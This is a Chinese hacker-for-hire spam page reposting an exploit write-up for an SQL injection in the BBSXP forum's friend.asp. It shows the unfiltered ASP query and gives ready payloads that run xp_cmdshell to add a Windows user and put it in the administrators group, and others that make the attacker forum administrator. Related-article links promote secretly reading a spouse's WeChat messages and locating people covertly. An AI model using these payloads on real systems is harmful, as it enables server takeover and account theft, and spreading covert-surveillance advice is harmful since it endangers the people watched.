24小时接单的黑客qq群 先办事后付款的黑客qq

访客3年前关于黑客接单521

漏洞描述:   相信大家都听过bbsxp吧,它是一款网上流行的论坛程序,我就不多作介绍了。这次我检测的是它的sql版,没过多久果然就发现了问题了  我们利用它可以掌握整个论坛的生杀大权,如果管理员sql服务器配置不当的话,甚至可以攻占整个服务器。 ............................................................................................................. 漏洞分析: 这个漏洞主要出在friend.asp这个文件,让我们来看一下有问题的部分源码,下面是用户添加好友的程序:   sub add if Request("username")="" then error2("请输入您要添加的好友名字!") end if if Request("username")=Request.Cookies("username") then error2("不能添加自己!") end if if conn.execute("Select count(id)from [user] where username='"&Request("username")&"'")(0)=0 then error2("数据库不存在此用户的资料!") end if  只要求好友的名字不为空和不能添加自己,并没有过滤特殊符号,其实这个不能添加自己的限制也是能绕过的,不过也没什么用 :)。 ..................................................................................................................... 利用 *** :  注册随便注册一个用户,这里我注册的是pinkeyes,好,转到个人控制面板,添加一个论坛存在的人为好友,这里我选的人是king, 选择添加好友按钮,这时会弹出一个输入框,在里面输入: king' ;exec master.dbo.xp_cmdshell 'net user pinkeyes pinkeyes /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- 添加了一个名为pinkeyes,密码为pinkeyes的账户。 ..................................................................................................................... 再来: king' ;exec master.dbo.xp_cmdshell 'net localgroup administrators pinkeyes /add';--      把pinkeyes加到管理员用户组中。下面的事就不用我说了吧! 注意:如果连接数据库的账号没有权限的话或管理员删除了master.dbo.xp_cmdshell这个存储过程的话是不会成功.但是你可以对这个数据库做 任何事。 ..........................................................................................................................   如果不能添加账户也没关系,也阻挡不了我前进的步伐。好,下面我来讲一下利用 *** : 仍然是添加好友,输入: king' ;update [user] set membercode=5,levelname='社区区长' where username='pinkeyes' -- 把pinkeyes提升为社区区长,前台工作。 再来输入: king';update clubconfig set administrators='│pinkeyes│',adminpassword='pinkeyes' -- 把后台管理员设为pinkeyes,密码也为pinkeyes ok,现在你是管理员了,要干什么就干什么吧! 

相关文章

怎么监控老公的微信聊天记录不被他发现查询 如

●菲律宾欲(借改名)弥补它没有获得美国支持之后的这种舆论上的被动局面,企图突出菲特色以影响国际舆论,事实上菲律宾对这个岛也有很多种叫法。   ●菲律宾的这种(改名)行为是不可能得到国际社会的支持的,...

憋回去的屁最终很可能会?蚂蚁庄园5月13日庄园小课堂答案

憋回去的屁最终很可能会?蚂蚁庄园5月13日庄园小课堂答案

2020年5月13日支付宝蚂蚁庄园庄园小课堂答案是什么?5月13日的问题是憋回去的屁,最终很可能会?给出的选项是被口鼻排出体外、消失在身体内部,大家知道应该选择哪个答案吗?下面小编为大家带来了2020...

黑客如何通过微信偷偷获取对方位置(黑客教你定位微信地址)

黑客如何通过微信偷偷获取对方位置(黑客教你定位微信地址),微信可以说是每个智能手机用户都会使用的通讯软件之一。除了聊天,还有很多功能可以使用。那么我们来告诉您如何通过微信了解好友的实时位置。 黑客教...

百度金矿挖矿亲身体验,告诉你如何通过百度金

百度金矿挖矿亲身体验,告诉你如何通过百度金

最近百度推出,百度金矿大众版P2P CDN大众挖矿项目。这个项目,门槛很低,只需要有个人闲置电脑和家庭带宽即可参与。 该项目的原理,就是利用家庭闲置带宽,为CDN提供服务,以换取现金收益。...

wangle系统涉嫌套利取款维护风控审核本公告提款怎么解决_微软

网络虚拟无保障,所以玩家被假网黑钱的事时有发生。国内法律不允许,所以我们吃了亏多数都选择忍气吞声,最多发发牢骚骂骂娘。被黑之后网站方只要不是自愿想给你几乎是没有任何方法能拿回来的。 一般来说被黑能成...

晚上可以干什么挣钱(晚上的空余时间可以做什

晚上可以干什么挣钱(晚上的空余时间可以做什

现在很多生活在城市的小伙伴,由于来自房贷和车贷的压力,每个月的固定工资已经满足不了需求,想要利用晚上或者周末的业余时间来挣钱,但是又不知道从何下手,下面为大家介绍几种晚上业余时间干什么容易挣钱的好项目...